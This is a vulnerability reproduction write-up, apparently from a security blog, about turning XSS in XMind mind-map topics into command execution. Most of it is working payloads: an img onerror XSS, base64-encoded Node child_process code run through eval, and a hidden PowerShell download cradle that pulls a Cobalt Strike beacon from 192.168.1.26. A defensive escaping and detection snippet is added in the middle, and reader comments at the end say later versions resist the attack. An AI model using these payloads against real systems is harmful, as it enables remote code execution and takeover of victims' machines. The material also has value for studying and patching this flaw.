Reproducing the XMind command execution vulnerability

Introduction

XMind is a professional, globally leading commercial mind-mapping application that is widely used in China. It offers powerful features including thought management, business presentations, and integration with office software. Built on the advanced Eclipse RCP architecture, it is a visual thinking tool combining mind mapping and brainstorming, used to capture ideas, organize thoughts, manage complex information, and support team collaboration. XMind was named "Best Brainstorming and Mind-Mapping Tool" and "Most Popular Mind-Mapping Software" by the well-known internet publication Lifehacker.

Affected versions

XMind 2020 through XMind 2021 beta11 are all affected by this vulnerability

Reproduction

Download the latest version of XMind from the official site and install it

Open it and test for the XSS vulnerability

Create a template and enter the payload in a topic, then click Outline. Saving from the outline page, or moving the cursor to the topic field and then moving it down, will both trigger the vulnerability.

XSS payload

<img src=1 onerror=alert(1)>

Building a command execution payload

whoami

const tenet = require('child_process')
tenet.exec('whoami',(error, stdout, stderr)=>{
    alert(`stdout: ${stdout}`);
  });

base64 encoded

Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykKdGVuZXQuZXhlYygnd2hvYW1pJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7

Final payload

<img src=x onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykKdGVuZXQuZXhlYygnd2hvYW1pJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7`,`base64`).toString())'>
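From a defender's view, the root cause shown above is untrusted topic text being inserted as HTML in a renderer that has Node access. The following is an added example (not XMind's own code) showing HTML escaping that renders such a title inert, plus a check that decodes a `Buffer(..., 'base64')` wrapper so embedded `child_process` use can be flagged; the function names are hypothetical and the sample title is the page's first payload.

```javascript
// Added example (not XMind's code): render untrusted topic titles as text, and flag
// titles carrying the base64-wrapped command-execution pattern from this writeup.

// Escape the five characters that let text break out into markup.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Safe rendering: the title can never become an element or an event handler.
function renderTopic(title) {
  return `<div class="topic">${escapeHtml(title)}</div>`;
}

// Decode every base64 literal passed to Buffer(...) / Buffer.from(...) in the title,
// so the wrapped script is visible to the check; returns the decoded strings.
function decodeBufferLiterals(title) {
  const re = /Buffer(?:\.from)?\(\s*[`'"]([A-Za-z0-9+/=]+)[`'"]\s*,\s*[`'"]base64[`'"]\s*\)/g;
  const out = [];
  let m;
  while ((m = re.exec(title)) !== null) {
    out.push(Buffer.from(m[1], 'base64').toString('utf8'));
  }
  return out;
}

// Flag an inline HTML event handler attribute or, after decoding, a child_process require.
function looksLikeInjection(title) {
  const eventHandler = /<[^>]*\son\w+\s*=/i.test(title);
  const inner = [title, ...decodeBufferLiterals(title)].join('\n');
  const nodeExec = /require\(\s*['"`]child_process['"`]\s*\)/.test(inner);
  return eventHandler || nodeExec;
}

// Constructed sample: the writeup's whoami payload, as it would arrive in a topic title.
const SAMPLE_TITLE = "<img src=x onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykKdGVuZXQuZXhlYygnd2hvYW1pJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7`,`base64`).toString())'>";
```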

Executing ipconfig /all

Getting a CS (Cobalt Strike) beacon to check in

Using PowerShell for the check-in

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.26:80/xmind'))"

Building the command execution payload

const tenet = require('child_process')
tenet.exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://192.168.1.26:80/xmind\'))"',(error, stdout, stderr)=>{
    alert(`stdout: ${stdout}`);
  });

base64 encoded

Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykKdGVuZXQuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWMgIklFWCAoKG5ldy1vYmplY3QgbmV0LndlYmNsaWVudCkuZG93bmxvYWRzdHJpbmcoXCdodHRwOi8vMTkyLjE2OC4xLjI2OjgwL3htaW5kXCcpKSInLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsKICB9KTs=

Final payload

<img src=x onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykKdGVuZXQuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWMgIklFWCAoKG5ldy1vYmplY3QgbmV0LndlYmNsaWVudCkuZG93bmxvYWRzdHJpbmcoXCdodHRwOi8vMTkyLjE2OC4xLjI2OjgwL3htaW5kXCcpKSInLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsKICB9KTs=`,`base64`).toString())'>

Beacon checked in successfully
My blog: kosakd.top

Night owl, huh

:joy::joy::joy:

xmind202007272308 can't be reproduced

:face_with_monocle: original author passing by

xmind 202107130605 can't be reproduced